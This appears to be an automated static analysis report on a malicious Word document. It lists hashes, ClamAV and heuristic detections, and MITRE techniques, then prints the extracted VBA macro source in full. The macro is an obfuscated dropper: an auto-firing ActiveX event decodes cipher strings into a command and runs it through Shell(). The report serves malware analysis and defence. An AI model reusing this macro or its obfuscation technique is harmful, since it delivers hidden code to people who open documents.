Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66ac51e2c23ae3a1…

MALICIOUS

Office (OLE)

Size: 56.0 KB
Created: 2018-07-19 09:23:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 76392af855e84ba97ace0f20e0730972
SHA-1: 094be8ae13b14c35d8fa01498217e4a40de3af3e
SHA-256: 66ac51e2c23ae3a1174519e2185c43644ce9afdc2df62445e7970c0576e982a1
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. A critical heuristic flags the use of the Shell() function, which the macro uses to execute a command string that is assembled at runtime from obfuscated pieces. This strongly suggests the document is designed to download and execute a secondary payload, a common dropper behavior.

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-6615692-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6615692-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3815 bytes
SHA-256: 2271d4c5c5d1844f51c73d4fab01cf3bae0d71b24d9609f7066c0e457cd3bb41

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub InkPicture1_Resize(a As Long, b As Long, c As Long, d As Long)
fordtrks "poir", ""
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9D79E22C-05E4-4C00-AF66-1B8025AB5A54}{3EA3E815-E0E8-4B65-8BAC-734229CEF2BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox2_Change()
Shell UserForm1.TextBox2, 0
End Sub

Private Sub TextBox3_Change()
har = 1
VODARGOLIM
End Sub

Attribute VB_Name = "abupolyp"
Function suntoday(ByRef text, dec, name)
ad = ""
gr = text + ad
If ad = "" Then
text = gr + dec + name
End If
End Function

Function impalasun()
impalasun = "aft"
End Function

Function fordtrks(ByRef text, burefg)
UserForm1.TextBox3 = text
End Function

Attribute VB_Name = "etallitit"
Function noprocth()
bhpjugzi = 7 * Rnd() + 2
ANDREDD333 = ""
For i = 1 To bhpjugzi
n = ""
taylorjan n, 24 * Rnd() + 97
ANDREDD333 = ANDREDD333 + n
Next i
noprocth = ANDREDD333
End Function

Function taylorjan(ByRef param, ter)
param = Chr(ter)
taylorjan = 1
End Function

Function poldie30(text)
decode = ""
For i = 1 To Len(text)
decode = decode + rainbowne(averetaP(Mid(text, i, 1)), 5)
Next i
poldie30 = decode
End Function

Function rainbowne(num, key)
If num - key < 1 Then
rainbowne = Mid(UserForm1.TextBox1, Len(UserForm1.TextBox1) + num - key, 1)
Else
rainbowne = Mid(UserForm1.TextBox1, num - key, 1)
End If
End Function

Function averetaP(yuiuv)
tgirt = UserForm1.TextBox1
lenqt = Len(tgirt)
For i = 1 To lenqt
If yuiuv <> Mid(tgirt, i, 1) Then
yfiui = 1
Else
averetaP = i
End If
Next i
End Function

Attribute VB_Name = "moronman"
Function bilbothx(fr)
If 1 = 2 Then
End If
Select Case fr
Case 1
bilbothx = "/)k5[/5gfuiojxibb5]$gfuiojxibb5]]ls(/pdf(5"
Case 2
bilbothx = "{.jpod(z,5\"
Case "D"
bilbothx = "};{(iu f'ci/p5jajpi)%"
Case "E"
bilbothx = "(ip%ui'/bdi(p}%kfu(bfhkldbi{\"
Case 4
bilbothx = "_$$1p)g1|"
Case 5
bilbothx = "%imi$$}:jphop gof/ijj5$$1p)g1|"
Case 6
bilbothx = "%imi$$:-poa;"
Case 7
bilbothx = "{$$xppg4[[ldjxiojd(jif%/f)[fd%)fd$$}-/hp/x;"
Case 8
bilbothx = "{$$xppg4[[loij(fpmjif%/f)[fd%)fd$$}-$]]535fsp ldbi5 i(/fkd(z5hj/dd5 ldbighpx51p)g1|"
Case "AF"
bilbothx = "%'hp:5jphop gof/ijj5$1p)g1|"
Case "A"
bilbothx = "%'hp$5 ud(kfujpabi5xdkki(]"
End Select
End Function

Attribute VB_Name = "ploddame"
Function VODARGOLIM()
name1 = ""
name1 = noprocth()
name4 = noprocth()

text = ""

name2 = noprocth()

joshua4321 (bilbothx(1))
suntoday text, UserForm1.TextBox4, name1
name3 = noprocth()
joshua4321 (bilbothx(2))
suntoday text, UserForm1.TextBox4, name2
joshua4321 (bilbothx("D"))
suntoday text, UserForm1.TextBox4, ""
joshua4321 (bilbothx("E"))
suntoday text, UserForm1.TextBox4, name2

joshua4321 (bilbothx(4))
suntoday text, UserForm1.TextBox4, name3
joshua4321 (bilbothx(5))
suntoday text, UserForm1.TextBox4, name3
joshua4321 (bilbothx(6))
suntoday text, UserForm1.TextBox4, name1
joshua4321 (bilbothx(7))
suntoday text, UserForm1.TextBox4, name1
joshua4321 (bilbothx(8))
suntoday text, UserForm1.TextBox4, name4
joshua4321 (bilbothx("AF"))
suntoday text, UserForm1.TextBox4, name4
joshua4321 (bilbothx("A"))
suntoday text, UserForm1.TextBox4, ""

UserForm1.TextBox2 = text
End Function

Function joshua4321(text)
UserForm1.TextBox4 = poldie30(text)
End Function